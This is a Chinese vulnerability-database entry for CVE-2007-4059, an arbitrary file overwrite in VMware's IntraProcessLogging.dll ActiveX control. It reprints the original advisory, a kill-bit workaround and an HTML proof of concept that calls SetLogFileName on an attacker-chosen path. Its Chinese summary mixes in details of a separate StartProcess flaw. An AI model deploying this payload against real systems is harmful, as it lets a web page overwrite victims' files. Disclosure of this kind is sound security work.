VMware intraprocesslogging.dll ActiveX控件任意文件覆盖漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113394 漏洞类型 设计错误
发布时间 2007-07-28 更新时间 2007-09-20
CVE编号 CVE-2007-4059 CNNVD-ID CNNVD-200707-559
漏洞平台 Windows CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/4240
https://www.securityfocus.com/bid/25110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-559
|漏洞详情
VMwareWorkstation是一款非常流行的虚拟PC机软件。VMwareintraprocesslogging.dllActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞在用户系统上执行任意指令。VMware中所捆绑的vielib.dll库中的StartProcess方式没有验证是否被应用程序或恶意用户调用,如果用户受骗访问了恶意网页的话,调用了该库的应用程序就可能导致以登录用户的权限执行任意指令。
|漏洞EXP
<!--
---------------------------------------------------------------------------

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
===========================================================================

Internal ID: VULWAR200707280.
-----------

Introduction
------------
IntraProcessLogging.dll is a library included in the Program Vmware from
Vmware Inc. Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The SetLogFileName method doesn't check if it's being called from the
application,
or malicious users. Remote Attacker could craft a html page and overwrite
arbitrary
files in a system.


Impact
------
Any computer that uses this Sofware will be exposed to Data Write Arbitrary.


Workaround
----------
- Activate the Kill bit zero in clsid:AF13B07E-28A1-4CAC-9C9A-EC582E354A24
- Unregister IntraProcessLogging.dll using regsvr32.


Timeline
--------
July 28 2007 -- Bug Discovery.
July 28 2007 -- Exploit published.


Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>


Technical Details
-----------------

SetLogFileName method receives one argument filename in this format
"c:\path\file".


Proof of Concept
---------------->

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\arbitrary_file.txt"
   ctrl.SetLogFileName(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-28]
|受影响的产品
VMWare Workstation 6.0 VMWare Workstation 5.5.4 build 44386 VMWare Workstation 5.5.4 VMWare Workstation 5.5.3 build 42958 VMWare Workstation 5.5.3 build 34685 VMWare Worksta
|参考资料

来源:BID
名称:25110
链接:http://www.securityfocus.com/bid/25110
来源:XF
名称:vmware-intraprocesslogging-file-overwrite(35675)
链接:http://xforce.iss.net/xforce/xfdb/35675
来源:www.vmware.com
链接:http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html
来源:www.vmware.com
链接:http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html
来源:www.vmware.com
链接:http://www.vmware.com/support/server/doc/releasenotes_server.html
来源:www.vmware.com
链接:http://www.vmware.com/support/player2/doc/releasenotes_player2.html
来源:www.vmware.com
链接:http://www.vmware.com/support/player/doc/releasenotes_player.html
来源:www.vmware.com
链接:http://www.vmware.com/support/ace/doc/releasenotes_ace.html
来源:MILW0RM
名称:4240
链接:http://www.milw0rm.com/exploits/4240
来源:VUPEN
名称:ADV-2007-3229
链接:http://www.frsirt.com/english/advisories/2007/3229
来源:SECUNIA
名称:26890
链接:http://secunia.com/advisories/26890
来源:FULLDISC
名称:20070920VMSA-2007-0006CriticalsecurityupdatesforallsupportedversionsofVMwareESXServer,VMwareServer,VMwareWorkstation,VM